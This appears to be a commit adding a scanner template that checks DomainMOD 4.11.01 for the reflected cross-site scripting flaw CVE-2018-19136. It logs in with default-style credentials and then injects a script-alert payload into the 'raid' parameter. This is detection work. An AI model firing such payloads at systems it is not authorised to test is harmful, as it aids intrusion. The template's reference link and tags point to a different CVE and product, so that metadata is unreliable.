Create CVE-2018-19136.yaml
parent
05238263b9
commit
60814cfc10
|
@ -0,0 +1,49 @@
|
|||
id: CVE-2018-19136
|
||||
|
||||
info:
|
||||
name: DomainMOD 4.11.01 - 'assets/edit/registrar-account.php' Reflected Cross-Site Scripting
|
||||
author: arafatansari
|
||||
severity: medium
|
||||
description: |
|
||||
DomainMOD 4.11.01 is vulnerable to Reflected Cross Site Scripting (rXSS) via assets/edit/registrar-account.php.
|
||||
reference:
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2018-19751
|
||||
- https://www.exploit-db.com/exploits/45883/
|
||||
|
||||
metadata:
|
||||
verified: true
|
||||
tags: wbcecms,xss
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
|
||||
- |
|
||||
POST /domain/ HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
new_username=admin&new_password=admin123
|
||||
|
||||
- |
|
||||
GET /domain/assets/edit/registrar-account.php?raid=hello%22%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E&del=1 HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
cookie-reuse: true
|
||||
matchers-condition: and
|
||||
|
||||
max-redirects: 3
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "<script>alert(1)</script>"
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- text/html
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
Loading…
Reference in New Issue